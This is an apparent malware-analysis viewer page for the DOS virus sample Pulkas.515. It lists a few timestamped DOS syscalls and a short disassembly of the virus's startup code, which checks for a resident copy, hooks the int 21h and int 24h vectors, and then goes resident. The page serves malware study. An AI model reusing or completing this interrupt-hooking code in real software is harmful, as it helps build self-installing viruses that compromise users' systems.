Sample viewer

vx.netlux.org/Virus.DOS.Pulkas.515

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:00:43.694151377Z 44 PC: 12a44 | Get time 0x12a44: cmp dl, 0
0x12a47: jne 0x12a50
0x12a49: mov ah, 9
0x12a4b: mov dx, 0x1c4
0x12a4e: int 0x21
0x12a50: mov ax, 0xface
0x12a53: int 0x21
0x12a55: cmp ax, 0xa75e
0x12a58: je 0x12a90
0x12a5a: push es
0x12a5b: mov ax, 0
0x12a5e: mov es, ax
0x12a60: mov bx, word ptr es:[0x84]
0x12a65: mov word ptr [0x1ae], bx
0x12a69: mov bx, word ptr es:[0x86]
0x12a6e: mov word ptr [0x1b0], bx
0x12a72: mov word ptr es:[0x84], 0x152
0x12a79: mov word ptr es:[0x86], cs
0x12a7e: mov word ptr es:[0x90], 0x1b2
0x12a85: mov word ptr es:[0x92], cs
2018-12-17T23:00:43.696470992Z 250 PC: 12a55 | UNKNOWN!
2018-12-17T23:00:43.697719935Z 49 PC: 12a90 | Terminate and stay resident (Return code = '0' | Memory size = '49')